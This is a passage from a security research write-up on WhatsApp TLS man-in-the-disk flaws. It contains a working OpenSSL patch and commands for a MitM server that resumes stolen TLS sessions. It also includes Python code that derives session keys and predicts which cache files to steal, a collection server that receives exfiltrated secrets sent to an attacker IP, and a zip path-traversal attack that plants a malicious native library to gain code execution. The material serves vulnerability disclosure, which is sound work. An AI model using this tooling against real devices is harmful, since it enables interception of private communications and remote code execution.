$ openssl sess_id -in /tmp/session.pem -text | egrep '(Master|Session)'
SSL-Session:
    Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A
    Session-ID-ctx:
    Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137

Now, enter directory tls12_psk_extract in the PoC repository [37], copy /tmp/session.pem and convert it to DER format:

$ pwd
[..]/whatsapp-mitd-mitm/tls12_psk_extract
$ cp /tmp/session.pem .
$ openssl sess_id -inform PEM -in session.pem -outform DER -out session.der

Unfortunately, unlike s_client, OpenSSL's s_server does not allow specifying a master secret or a session ID at the command line for the purpose of accepting resumed TLS 1.2 sessions (i.e. there's no -psk equivalent for TLS 1.2). For this purpose, we modified OpenSSL's ssl/ssl_sess.c to have s_server load a TLS session from an external DER file. Consider it similar to -sess_in of s_client.

+    /* CENSUS: Load the BoringSSL session converted to OpenSSL format. */
+    if(ret == NULL) {
+        int fd;
+        char buf[4096], *bufp = &buf[0];
+        size_t size;
+        SSL_SESSION *session;
+
+        printf("[CENSUS] Loading BoringSSL session from %s\n", SESSION_FILE);
+
+        if((fd = open(SESSION_FILE, O_RDONLY)) >= 0) {
+
+            size = read(fd, buf, sizeof(buf));
+            printf("[CENSUS] Loaded %zu bytes\n", size);
+
+            if((session = d2i_SSL_SESSION(NULL, (const unsigned char **)&bufp, size)) != NULL) {
+                printf("[CENSUS] Session was successfully loaded at %p\n", (void *)session);
+                ret = session;
+            }
+
+            close(fd);
+        }
+    }

With this modification, a client can save TLS session information in a DER file, using -sess_out, and then have an s_server instance load that file during the TLS 1.2 handshake. The effect is similar to the -psk example demonstrated previously; a client with prior knowledge of the session ID and the master secret will successfully establish the TLS connection. The corresponding OpenSSL modifications can be found in our PoC repository [37], at openssl-1.1.1f-patches/tls12-mitm.patch. Follow the instructions in tls12_psk_extract/README.md to prepare an OpenSSL 1.1.1f variant capable of performing TLS 1.2 MitM. When ready, just run the MitM server:

$ ./run_server.sh
...
Running TLS v1.2 version
Using default temp DH parameters
ACCEPT

Using s_client, attempt to resume the session initially established with crashlogs.whatsapp.net, but this time connect to localhost instead. 
To do this, use the -sess_in command line switch, as shown below: $ openssl s_client -tls1_2 -host localhost -port 443 -sess_in /tmp/session.pem CONNECTED(00000006) --- Server certificate -----BEGIN CERTIFICATE----- MIIF1zCCBL+gAwIBAgIQDOmsxODES4Klhbv8cv6EizANBgkqhkiG9w0BAQsFADBw MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 d3cuZGlnaWNlcnQuY29tMS8wLQYDVQQDEyZEaWdpQ2VydCBTSEEyIEhpZ2ggQXNz dXJhbmNlIFNlcnZlciBDQTAeFw0yMTAyMTAwMDAwMDBaFw0yMTA1MTAyMzU5NTla MGkxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRMwEQYDVQQHEwpN ZW5sbyBQYXJrMRcwFQYDVQQKEw5GYWNlYm9vaywgSW5jLjEXMBUGA1UEAwwOKi53 aGF0c2FwcC5uZXQwWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAARnhHhwhX0sqHwl bcIQUCcf6974FldeoPmrHOOEDPGSxeRVRxOXRaGjfX72Xlakyz5WpJx8uSlghjjz qvaTeBNwo4IDPTCCAzkwHwYDVR0jBBgwFoAUUWj/kK8CB3U8zNllZGKiErhZcjsw HQYDVR0OBBYEFDGwR2i4anDM4OmK42mRNINbzAxdMHQGA1UdEQRtMGuCEiouY2Ru LndoYXRzYXBwLm5ldIISKi5zbnIud2hhdHNhcHAubmV0gg4qLndoYXRzYXBwLmNv bYIOKi53aGF0c2FwcC5uZXSCBXdhLm1lggx3aGF0c2FwcC5jb22CDHdoYXRzYXBw Lm5ldDAOBgNVHQ8BAf8EBAMCB4AwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUF BwMCMHUGA1UdHwRuMGwwNKAyoDCGLmh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9z aGEyLWhhLXNlcnZlci1nNi5jcmwwNKAyoDCGLmh0dHA6Ly9jcmw0LmRpZ2ljZXJ0 LmNvbS9zaGEyLWhhLXNlcnZlci1nNi5jcmwwPgYDVR0gBDcwNTAzBgZngQwBAgIw KTAnBggrBgEFBQcCARYbaHR0cDovL3d3dy5kaWdpY2VydC5jb20vQ1BTMIGDBggr BgEFBQcBAQR3MHUwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNv bTBNBggrBgEFBQcwAoZBaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lD ZXJ0U0hBMkhpZ2hBc3N1cmFuY2VTZXJ2ZXJDQS5jcnQwDAYDVR0TAQH/BAIwADCC AQUGCisGAQQB1nkCBAIEgfYEgfMA8QB2AH0+8viP/4hVaCTCwMqeUol5K8UOeAl/ LmqXaJl+IvDXAAABd4q64v0AAAQDAEcwRQIgKZOZs5XzLPIAR1XcJzkjS721qtTO 7HnHtN9lQ6gmLjUCIQCiJCYvSURNjEWk+OKy9DJQ8J19BeZTXPqQtEq3HrcTLwB3 AFzcQ5L+5qtFRLFemtRW5hA3+9X6R9yhc5SyXub2xw7KAAABd4q64skAAAQDAEgw RgIhAKzh5Q+vXt+C9HS7r+H1ZjJIQeK11tLGnBNGVFAExeSLAiEAsAW8HhwfFSBE sHaeIUyKt1xq03qjfjLmy6FQnE3lDj8wDQYJKoZIhvcNAQELBQADggEBAF+XRlKE eval5PuqA1hKHJRtvP5uQUneXLAS+ch1pjhfveKjUuiWm+04y+liSlVRoGNm/6Og 
GEg9CrCMu2SlFsD6UMsK6BMmb3HWcFH5P9HY1so1cIsXcpSxwJEDbZD8ATDA1rH3 komGIYbzgMbcfMi/mjyXTvxrdaBp5QnT32PzOxMyYuWn2gg3n7wxBKppyGuuqarP tIXuIsBkLe+6k1S0+gvuRS4l28V/BD985eQZJg8/KE6061v/aLNBlP3anIksH9AJ 9j1zerIq9cL7NEcvz1PEu97D1SpBH75znPAHArtjXa/0U7SRwQxahx8a82pl/+Zb rGufx1+jMcviB6M= -----END CERTIFICATE----- subject=C = US, ST = California, L = Menlo Park, O = "Facebook, Inc.", CN = *.whatsapp.net issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert SHA2 High Assurance Server CA --- No client certificate CA names sent --- SSL handshake has read 141 bytes and written 485 bytes Verification error: unable to get local issuer certificate --- Reused, TLSv1.2, Cipher is ECDHE-ECDSA-AES128-GCM-SHA256 Server public key is 256 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE No ALPN negotiated SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-ECDSA-AES128-GCM-SHA256 Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A Session-ID-ctx: Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137 PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 172800 (seconds) TLS session ticket: 0000 - 8b 5b f6 5b c6 05 a2 36-48 88 79 8e 5d e6 55 f8 .[.[...6H.y.].U. 0010 - e2 75 43 33 a5 84 b4 8e-60 38 ee e8 bb a8 69 ad .uC3....`8....i. 0020 - 56 cb 6e a4 9a f4 93 fd-0a 67 51 f4 68 0d 59 40 V.n......gQ.h.Y@ 0030 - 49 80 97 7b ce 9f 6b fb-73 27 65 df 0e c3 8f b6 I..{..k.s'e..... 0040 - f7 9a 9c 31 2f b3 e3 8b-32 9c d3 0d 46 30 84 d3 ...1/...2...F0.. 0050 - 89 5c 82 a7 28 9a 41 18-53 9e fa 58 b1 80 78 62 .\..(.A.S..X..xb 0060 - b3 f6 bc ce bd e5 5b 40-f1 14 16 b4 66 b4 80 48 ......[@....f..H 0070 - 1c ba d2 ed 23 9f cd 80-b2 56 a1 e8 0f 6b 6d e2 ....#....V...km. 0080 - 03 40 ba 92 3a f4 a6 b9-ef 35 8e 87 68 6e 54 1a .@..:....5..hnT. 0090 - 05 ac eb 5c 2b c4 52 3d-ca f8 6d 91 22 ce 21 d5 ...\+.R=..m.".!. 
00a0 - d4 56 32 35 23 a2 6c 20-31 0e 71 b6 04 24 ac 64 .V25#.l 1.q..$.d
00b0 - 8f bb 77 d7 97 04 bc 73-71 ff 86 0c e3 a7 45 2e ..w....sq.....E.
00c0 - 16 dc ac b9 61 9f 60 d9-c3 cb 2d 73 87 33 53 32 ....a.`...-s.3S2

Start Time: 1616078131
Timeout : 7200 (sec)
Verify return code: 20 (unable to get local issuer certificate)
Extended master secret: yes
---

Notice that, at the client side, the connection is not aborted; apart from the expected verification warning (our MitM server cannot present a trusted certificate chain), the handshake completes and, since the session identifier and the master secret are both known, the encrypted session is resumed normally. Indeed, taking a closer look at the output above reveals that the session identifier and the master secret have been successfully reused, as they match those of /tmp/session.pem:

SSL-Session:
    Protocol : TLSv1.2
    Cipher : ECDHE-ECDSA-AES128-GCM-SHA256
    Session-ID: 6B0B3946BC2CB7A1C661C0E06824A778FB71130228758D9CA131646A6AF1EE0A
    Session-ID-ctx:
    Master-Key: 9458D6E22954C615B42B24B9FBF19D31B694F9A66F4ACBC1EF93B082A7BDB862C11270DA6A283EAD3E1F2D848300A137

At the server side, our modified OpenSSL server loads session.der (produced from /tmp/session.pem), reads the session identifier and the master secret from there, and resumes the session as if nothing were wrong. The following output is displayed:

$ ./run_server.sh
...
[CENSUS] Looking up session 6b0b3946bc2cb7a1...
[CENSUS] SSL_SESS_CACHE_NO_INTERNAL_LOOKUP not set!
[CENSUS] Loading BoringSSL session from session.der
[CENSUS] Loaded 1877 bytes
[CENSUS] Session was successfully loaded at 0x7fc168d21e90
[CENSUS] Session cache miss, no problem!

The session identifier was not found in the server's cache. This is no problem for our MitM server, as the stolen session (session.der) is explicitly loaded and reused, as if it had been found in the cache in the first place. At this point the client believes it is communicating securely; however, its communications are subject to eavesdropping and modification by the man-in-the-middle server! 
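Knowledge of the master secret is sufficient here because, in TLS 1.2, every record-layer key is derived deterministically from the master secret and the two hello randoms. The sketch below reproduces the RFC 5246 PRF (P_SHA256, section 5) and the key-block expansion (section 6.3); the inputs are placeholders, not values from a real session.

```python
import hmac
import hashlib

def p_sha256(secret: bytes, seed: bytes, length: int) -> bytes:
    """P_SHA256 from RFC 5246 section 5: HMAC-SHA256-based expansion."""
    out = b""
    a = seed  # A(0) = seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()            # A(i) = HMAC(secret, A(i-1))
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()  # HMAC(secret, A(i) + seed)
    return out[:length]

def prf(secret: bytes, label: bytes, seed: bytes, length: int) -> bytes:
    # TLS 1.2 PRF: P_SHA256(secret, label + seed)
    return p_sha256(secret, label + seed, length)

def key_block(master_secret: bytes, server_random: bytes,
              client_random: bytes, length: int) -> bytes:
    # RFC 5246 section 6.3 -- note the server_random || client_random order.
    return prf(master_secret, b"key expansion", server_random + client_random, length)
```

An eavesdropper holding the master secret only needs the two randoms, which travel in cleartext in the hello messages, to reproduce the exact MAC keys, encryption keys and IVs of the session.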
The WhatsApp TLS Man-in-the-Disk Vulnerabilities

Privacy is one of WhatsApp's major features. It is achieved by using end-to-end encryption [23] in messages exchanged between clients, as well as through the use of TLS 1.3 / TLS 1.2 for client-to-server communications (the actual protocol used depends on the endpoint) [24]. To take advantage of the benefits offered by TLS session resumption, WhatsApp implements its own TLS-PSK session management code for TLS 1.3 and uses FileClientSessionCache [25] for TLS 1.2. The logic is pretty simple; when a TLS connection is initiated, WhatsApp looks for a previously stored session on the device's filesystem. If one is found, a PSK or master secret is loaded from there and the session is resumed. Otherwise, a full TLS handshake takes place, after which PSK / master secrets might be established and stored for future use.

The above TLS session management code introduced two identical man-in-the-disk vulnerabilities, one affecting TLS 1.2 connections and one affecting TLS 1.3 connections. The problem is that WhatsApp stores the aforementioned TLS session information in the directory returned by Context.getExternalCacheDir(). This directory lies under the external storage (/sdcard). Any Android app holding the READ_EXTERNAL_STORAGE or WRITE_EXTERNAL_STORAGE permission could gain read / write access to these files through the filesystem, on Android 10 and previous versions of Android. Alternatively, these files were indexed and made available to other apps through the Media Store content provider on Android 9 and previous versions of Android.

WaTLS (WhatsApp TLS) is WhatsApp's custom Java implementation of TLS 1.3. WaTLS is a full TLS stack, developed from scratch, that comes with its own TLS state machine, packet parsing logic and so on. When connected to the WhatsApp network, a WhatsApp client receives configuration information from the upstream servers. 
Among other things, the aforementioned configuration controls whether the client should use WaTLS or fall back to the external SSL cache. WaTLS is mostly used for media downloads, including end-to-end (E2E) encrypted media exchanged by users. Other than that, it is used behind the scenes when newly updated WhatsApp installations upload crash statistics to WhatsApp cloud servers (e.g. memory dumps). Additionally, it seems to have limited usage in VoIP scenarios, but the author has not investigated this further.

As shown below, the WatlsCache class, which controls access to TLS session information cached on disk, stores all data under the directory returned by application.getExternalCacheDir(). The getWatlsFileName() method is called to retrieve the filename that stores the TLS session information corresponding to the session identifier argument.

public class WatlsCache implements WatlsCacheInterface {
    public static final WatlsCache instance = new WatlsCache();
    public String watlsDirName;

    static {
        ...
        if(application != null && application.getExternalCacheDir() != null) {
            String A0C = AnonymousClass0CC.concatStrings(r1.application.getExternalCacheDir().getAbsolutePath(), "/", "watls-sessions");
            File file = new File(A0C);
            ...
            instance.watlsDirName = A0C;
        }
    }

    ...

    public final String getWatlsFileName(byte[] bArr) {
        return this.watlsDirName + "/" + Base64.encodeToString(bArr, 10);
    }
}

Cached items bear filenames that encode (serialize) information about the TLS session endpoint. See, for example, the following filename, which carries base64-encoded information about the hostname, port and cipher suite of a WhatsApp endpoint:

$ echo 'bWVkaWEuZmF0aDQtMi5mbmEud2hhdHNhcHAubmV0IzQ0MyNUTFNfQUVTXzEyOF9HQ01fU0hBMjU2' | base64 -D
media.fath4-2.fna.whatsapp.net#443#TLS_AES_128_GCM_SHA256

For TLS 1.2 connections, WhatsApp relies on facilities offered by Java and consequently by the Android framework. 
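The cache filename scheme decoded above can be reproduced in a few lines. In Android's Base64 API, the flag value 10 passed to encodeToString() corresponds to URL_SAFE | NO_WRAP; the host#port#cipher layout of the lookup key is inferred from the decoded sample, not from the WhatsApp sources:

```python
import base64

def watls_cache_name(host: str, port: int, cipher: str) -> str:
    # Lookup-key layout inferred from the decoded sample filename.
    key = f"{host}#{port}#{cipher}".encode()
    # Android's Base64 flag 10 == URL_SAFE (8) | NO_WRAP (2).
    return base64.urlsafe_b64encode(key).decode()

name = watls_cache_name("media.fath4-2.fna.whatsapp.net", 443,
                        "TLS_AES_128_GCM_SHA256")
```

Reproducing this encoding lets an attacker predict, for any endpoint of interest, the exact filename of the cached WaTLS session to steal from the external cache directory.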
The TLS 1.2 mechanism is used for profile picture and sticker pack downloads, sonar pingback (related to location sharing), WhatsApp payments, but also for account registration and verification procedures. Last but not least, devices running WhatsApp that come with no Google Play Store (com.android.vending) pre-installed communicate with https://www.whatsapp.com over TLS 1.2 to determine the latest version of the APK and, if needed, download the app and install it.

In TLS 1.2, file-based storage of TLS sessions is achieved via SSLSessionCache [28], whose constructor takes a File instance pointing to the directory where sessions will be stored. An SSLSocketFactory descendant is used to actually create SSL sockets utilizing the external SSL session cache. The entry point to this logic is ExternalSSLCacheEnabledSSLSocketFactoryInterface (X.1Sb), shown below.

public abstract class ExternalSSLCacheEnabledSSLSocketFactoryInterface extends SSLSocketFactory {
    ...
    public final SSLSessionCache externalSSLSessionCache;
    ...
    static {
        File externalCacheDir = context.getExternalCacheDir();
        SSLSessionCache sslSessionCache = new SSLSessionCache(new File(externalCacheDir, "SSLSessionCache"));
        this.externalSSLSessionCache = sslSessionCache;
    }
}

Again, we see that context.getExternalCacheDir() is consulted to identify the path where cached TLS session items will be stored. An adversary that has somehow gained access to the external cache directory (e.g. through a rogue or vulnerable application) can steal TLS 1.3 PSK keys and TLS 1.2 Master Secrets. As already discussed, this could lead to successful man-in-the-middle attacks. For the purposes of this article, we will use the previously described SOP bypass vulnerability in Chrome to remotely access the TLS session secrets. All an attacker has to do is lure the victim into opening an HTML document attachment. 
WhatsApp will render this attachment in Chrome, over a content provider, and the attacker's Javascript code will be able to steal the stored TLS session keys. Convincing a user to actually open an HTML document is an art by itself. However, as will become clear later, the protobuf-based WhatsApp messaging protocol can aid the attacker in this respect.

From TLS secrets collection to Remote Code Execution

This section explores two attacks against WhatsApp, one leading to code execution and one leading to the leakage of Noise protocol keys, used in the end-to-end encryption of user communications. The former requires the TLS 1.2 man-in-the-middle capability, while the latter requires a combination of TLS 1.2 and TLS 1.3 man-in-the-middle capabilities. As the TLS 1.3 man-in-the-disk vulnerability had been patched by the time we were creating the demo for the issue, we emulated the TLS 1.3 man-in-the-middle capability through Frida in the second attack (forcing connections over TLS 1.2). If you have access to a version of the app where both TLS man-in-the-disk vulnerabilities exist, then it is possible to carry out the second attack without emulation, by setting up two OpenSSL instances; one for TLS 1.2 MitM and one for TLS 1.3 (WaTLS) MitM.

Both attacks start with an information gathering phase, where the remote attacker collects the TLS session secrets. In the video above, on the left, running the dark theme, is the attacker device, and on the right, running the light theme, the victim device. The attacker begins information gathering by executing main.py of the proof-of-concept toolset, which makes use of Python and Frida to control the attacking device. This is what the command looks like:

python main.py -s ANDROID_SERIAL -a 192.168.1.100 -p 8000 images/the_guardian.jpg \
    MOBILE_NUMBER@s.whatsapp.net "Rush for Mediterranean gas" -r

Argument -s ANDROID_SERIAL instructs ADB to connect to the attacker's device with the specified device serial number. 
Arguments -a and -p determine the IP address and port of the web server where the SOP exploit will POST the extracted secrets using AJAX, while -r instructs our PoC to run a simple HTTP server on the local PC. Alternatively, one could specify the IP of a remote web server the attacker controls. The three positional arguments are (1) the path to an image to show as a fake message preview at the victim's side, (2) the victim's mobile number and (3) a string to show as a caption below the fake preview. The PoC uses Frida hooks on a WhatsApp method responsible for sending document messages. It attaches the fake message preview and caption to the outgoing protocol buffer to make the result more attractive for the victim to click on.

In this demonstration, the remote attacker sends the victim what looks like a link to an interesting newspaper article. Upon clicking on the message, the victim is presented with the standard Android application picker. The message's MIME type, as sent in the WhatsApp protocol buffer headers, is set to 'text/html', so Chrome is usually the only entry in the aforementioned picker. When the victim clicks on the message, the SOP exploit executes. For debugging purposes we have designed an HTML page that displays progress information during exploitation, but a real-life scenario might have an actual newspaper article displayed on the victim's screen. The exploit, in just a few seconds, brute-forces the first 1000 IDs in the Media Store and locates files that look like serialized TLS sessions. Using AJAX, these files are sent back to a server of the attacker's choosing. In this demonstration, the web server has been started on the attacker's PC and the received TLS secrets are stored under /tmp in files with the .bin extension. With the TLS material now in the attacker's possession, the victim is exposed to man-in-the-middle attacks. 
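The collection endpoint can be as simple as an HTTP handler that writes every POSTed blob to disk. The sketch below is a hypothetical stand-in for the PoC's web server, not its actual code; the paths and names are illustrative:

```python
import http.server
import os
import threading

class CollectorHandler(http.server.BaseHTTPRequestHandler):
    """Hypothetical stand-in for the PoC's collection server."""
    save_dir = "/tmp"   # where exfiltrated session blobs are written
    counter = 0

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        blob = self.rfile.read(length)
        type(self).counter += 1
        path = os.path.join(self.save_dir, "session_%d.bin" % type(self).counter)
        with open(path, "wb") as f:
            f.write(blob)
        self.send_response(200)
        # Allow the exploit page's cross-origin AJAX POST to succeed.
        self.send_header("Access-Control-Allow-Origin", "*")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the demo output quiet

def serve(port: int = 8000) -> http.server.HTTPServer:
    server = http.server.HTTPServer(("0.0.0.0", port), CollectorHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Note the permissive CORS header: since the exfiltrating Javascript runs in a `content://` origin inside Chrome, the receiving server must opt in to cross-origin POSTs.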
To gain a man-in-the-middle position in the network, the attacker may use several methods (e.g. ARP spoofing, DNS spoofing, router / BGP hijacking, tapping of communication links etc.), depending on the available resources. Nation-state actors have demonstrated increased capabilities in this area of attacks in the past. There may be several opportunities for code execution once a MitM channel has been established, but for demonstration purposes this section focuses on a simple file overwrite capability made available through TLS-transported ZIP files.

The WhatsApp client uses photo filters and doodle emojis, which are downloaded from the upstream network. Both of these resources are referred to as downloadables in the WhatsApp Java code. Use of downloadables depends on WhatsApp network configuration parameters. Where the author lives, filters seem to be enabled, while emojis are disabled, so this attack will focus on the former. Additionally, photo filters are downloaded the first time a user attempts to use them, and are not downloaded again for the rest of the WhatsApp installation's lifetime, while doodle emojis are refreshed every now and then. Consequently, the attacker has a single chance of exploiting filters, while more opportunities are available for performing MitM on the emoji downloader. Interested readers can check the related network settings on their devices:

# pwd
/data/data/com.whatsapp/shared_prefs
# grep -r downloadable_doodle .

If no result is shown, downloadable doodle emojis are disabled on your device. When the user attempts to use photo filters, WhatsApp performs an HTTP request in the background to the following URL:

https://static.whatsapp.net/downloadable?category=filter

A ZIP bundle is downloaded from the above location and extracted using the following piece of code, which can be found in class FilterManager (X.2FB). Similar code can be found in the DoodleEmojiManager class (X.1zX) for emojis. 
public boolean unsafeExtractManifestEntryZip(HttpResponseInterface response, String str) { FileOutputStream fileOutputStream; ... // (1) ZipInputStream zipInputStream = new ZipInputStream( new MessageInputStream(response.getInputStream(), this.A06, 0) ); ... byte[] bArr = new byte[8192]; while(true) { // (2) ZipEntry nextEntry = zipInputStream.getNextEntry(); ... // (3) fileOutputStream = new FileOutputStream( new File(idHashFileName.getAbsolutePath(), nextEntry.getName()) ); while(true) { int read = zipInputStream.read(bArr); if(read == -1) break; fileOutputStream.write(bArr, 0, read); } fileOutputStream.close(); } zipInputStream.close(); ... } Focusing only on the relevant parts, at (1) a ZipInputStream is instantiated. The input to the ZipInputStream comes from another type of input stream which, in turn, reads its input from the HTTP channel established to the aforementioned URL. As the ZIP bundle is downloaded, input flows to the ZipInputStream and ZIP entries are parsed one-by-one at (2). The most interesting stuff happens at (3), where a FileOutputStream is created to a destination file whose name is constructed by concatenating the return value of getAbsolutePath() of a directory with the string returned from the ZIP entry's getName(). As is already known, the name of an entry in a ZIP directory should not be trusted, as it might contain directory traversal sequences. It's exactly this "feature" that an attacker can exploit to overwrite arbitrary files owned by WhatsApp. The next question is what file can an attacker overwrite in order to eventually execute code with the privileges of the WhatsApp client. Unfortunately, WhatsApp for no apparent reason makes use of Facebook's superpack for distributing its native libraries. What happens is that all native DSOs are placed in a compressed archive, in a proprietary format, and then packed in the application's APK as a raw asset. 
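The ZIP entry-name trust problem in the extraction code above is easy to reproduce. The sketch below (hypothetical filenames, Python's zipfile standing in for ZipInputStream) builds an archive whose entry name contains traversal sequences and extracts it with the same naive concatenation pattern:

```python
import io
import os
import zipfile

def build_malicious_zip(entry_name: str, payload: bytes) -> bytes:
    """Create a ZIP whose single entry has an attacker-chosen name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(entry_name, payload)  # zipfile does not sanitize entry names
    return buf.getvalue()

def naive_extract(zip_bytes: bytes, dest_dir: str) -> list:
    """Mirror the vulnerable pattern: dest = dest_dir + "/" + entry name."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for entry in zf.infolist():
            out_path = os.path.join(dest_dir, entry.filename)  # no validation!
            with open(out_path, "wb") as f:
                f.write(zf.read(entry))
            written.append(out_path)
    return written
```

An entry named `../../pwned.txt` lands two directories above the intended destination; a hardened extractor would reject any entry whose normalized path escapes dest_dir.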
When the application is executed, native libraries are extracted under data/ and SoLoader [31] is used to load them. Attackers are thus able to modify the extracted libraries and have the victim application load untrusted code. Here's where the extracted libraries can be found: # pwd /data/data/com.whatsapp/files/decompressed/libs.spk.zst # ls -la total 9042 drwx------ 2 u0_a168 u0_a168 3488 2021-02-10 17:30 . drwx------ 3 u0_a168 u0_a168 3488 2021-01-25 17:11 .. -rw------- 1 u0_a168 u0_a168 32 2021-02-10 17:30 .superpack_version -rw------- 1 u0_a168 u0_a168 1055016 2021-02-10 17:30 libc++_shared.so -rw------- 1 u0_a168 u0_a168 123744 2021-02-10 17:30 libcurve25519.so -rw------- 1 u0_a168 u0_a168 134056 2021-02-10 17:30 libfbjni.so -rw------- 1 u0_a168 u0_a168 47656 2021-02-10 17:30 libgifimage.so -rw------- 1 u0_a168 u0_a168 76296 2021-02-10 17:30 libminscompiler-jni.so -rw------- 1 u0_a168 u0_a168 200000 2021-02-10 17:30 libprofilo.so -rw------- 1 u0_a168 u0_a168 68368 2021-02-10 17:30 libprofilo_atrace.so -rw------- 1 u0_a168 u0_a168 23096 2021-02-10 17:30 libprofilo_build.so -rw------- 1 u0_a168 u0_a168 67688 2021-02-10 17:30 libprofilo_fb.so -rw------- 1 u0_a168 u0_a168 3720 2021-02-10 17:30 libprofilo_fmt.so -rw------- 1 u0_a168 u0_a168 23976 2021-02-10 17:30 libprofilo_linker.so -rw------- 1 u0_a168 u0_a168 68296 2021-02-10 17:30 libprofilo_mmapbuf.so -rw------- 1 u0_a168 u0_a168 48688 2021-02-10 17:30 libprofilo_plthooks.so -rw------- 1 u0_a168 u0_a168 9144 2021-02-10 17:30 libprofilo_sigmux.so -rw------- 1 u0_a168 u0_a168 134328 2021-02-10 17:30 libprofilo_stacktrace.so -rw------- 1 u0_a168 u0_a168 68432 2021-02-10 17:30 libprofilo_systemcounters.so -rw------- 1 u0_a168 u0_a168 68080 2021-02-10 17:30 libprofilo_threadmetadata.so -rw------- 1 u0_a168 u0_a168 83928 2021-02-10 17:30 libprofilo_util.so -rw------- 1 u0_a168 u0_a168 3240 2021-02-10 17:30 libprofiloextapi.so -rw------- 1 u0_a168 u0_a168 395992 2021-02-10 17:30 libstatic-webp.so -rw------- 1 
u0_a168 u0_a168 5880 2021-02-10 17:30 libvlc.so
-rw------- 1 u0_a168 u0_a168 6378408 2021-02-10 17:30 libwhatsapp.so
-rw------- 1 u0_a168 u0_a168 119408 2021-02-10 17:30 libyoga.so

The following video demonstrates the attack. A malicious libwhatsapp.so library is extracted over the legitimate one. WhatsApp exits and immediately attempts to restart. The malicious library is loaded and "pwnd!" is recorded to the system logs. Please note the following:

- The relevant material can be found in the PoC's tls12_psk_extract/ directory. Detailed instructions for setting up the MitM environment can be found in README.md in the same directory.
- To make testing and demonstration easier, instead of carrying out the information gathering phase again and again, we make use of ADB to pull the TLS session files directly from the victim device. These files correspond to the leaked .bin files shown in the previous video.
- The video shows the attacker preparing payload.zip, a ZIP file that holds the malicious libwhatsapp.so library. The name of the ZIP entry is modified to contain directory traversal sequences and the final archive is copied to tls12_psk_extract/ to be used by our MitM server scripts.
- Leaked TLS 1.2 sessions are actually DER-encoded structures. Recall that Android uses BoringSSL, while most Linux and Mac OS X PCs use OpenSSL instead. To make the leaked session recognizable by OpenSSL, one has to convert between the two DER formats. Script convert_session.sh, which uses boringssl_session.cpp and openssl_session.c in the background, is used for this task. The resulting OpenSSL session file is stored in the current directory as session.der (DER format) and session.pem (PEM format). Session information is also displayed on the screen.
- The last command in the long listing is a wrapper shell script, namely run_server.sh, that executes an OpenSSL version specially modified to perform MitM attacks on WhatsApp's TLS 1.2. 
The patch for OpenSSL 1.1.1f can be found in openssl-1.1.1f-patches/tls12-mitm.patch.

In the video, one can see the victim attempting to send a picture to the attacker. WhatsApp attempts to download the photo filters from the URL mentioned above but, instead, the modified s_server serves the malicious ZIP payload.

Stealing the victim's Noise protocol key pair

In this section we will see how the attained man-in-the-middle capability could also lead to the compromise of the confidentiality of user communications. The WhatsApp Security Whitepaper [23] explains that user communications are protected through end-to-end (E2E) encryption. The protocol used for E2E encryption is the Noise protocol [05]. WhatsApp comes with a debugging mechanism that allows its development team to catch fatal errors happening in the wild during the first few days of a release. More specifically, if an OutOfMemoryError exception is thrown, a custom exception handler is invoked that collects system information, WhatsApp application logs, as well as a dump of the application heap (collected using android.os.Debug::dumpHprofData()). These are uploaded to crashlogs.whatsapp.net. This process is carried out if and only if fewer than 10 days have elapsed since the current version's release date. Needless to say, the heap content that is uploaded to the WhatsApp infrastructure holds sensitive user information. Using the strings tool against the dumped heap data, one can easily identify plaintext conversations and, more interestingly, Noise protocol key pairs, encoded in base64 form. The relevant code can be found in class OOMHandler (X.0nS):

public void uncaughtException(Thread thread, Throwable throwable) {
    ...
    // (1)
    if(C008703v.getNumberOfDaysSinceReleaseDate(r12.expirationChecker) > 10) {
        z5 = true;
    }
    if(z5) {
        Log.m19i("OOMHandler/hprof dump not allowed");
    } else {
        ... 
        // (2)
        Debug.dumpHprofData(String.format(Locale.US, "%s/dump.hprof", new Object[] { r12.hprofFilenameMatcher.context.getCacheDir().getPath() }));
        Log.m19i("OOMHandler/dump successful");
    }
    ...
}

At (1), getNumberOfDaysSinceReleaseDate() is called, which performs the action its name indicates. If the return value is larger than 10, the heap contents are not dumped. However, in case fewer than 10 days have elapsed since the release date, the heap content is written to dump.hprof, placed in the application's private cache directory.

From an attacker's perspective, the above process is quite interesting, as all connections to the crash logs server, even though they are protected through TLS, can be intercepted after extracting the corresponding Master Secret from the victim's device. Interestingly, WhatsApp uses both TLS 1.2 and TLS 1.3 (WaTLS) during the information upload process; logs are uploaded using TLS 1.2, while heap contents are uploaded using TLS 1.3 (WaTLS). With the corresponding Master Secret / PSK extracted from a victim's device, both connections can be intercepted and their contents can be read in plaintext.

With this in mind, one might wonder how an OutOfMemoryError exception can be triggered remotely on the victim's device. While the author was preparing his debugging environment, he noticed that WhatsApp performs the following HTTP request quite often:

https://static.whatsapp.net/sticker?cat=all&lg=en-US&country=GR&ver=2

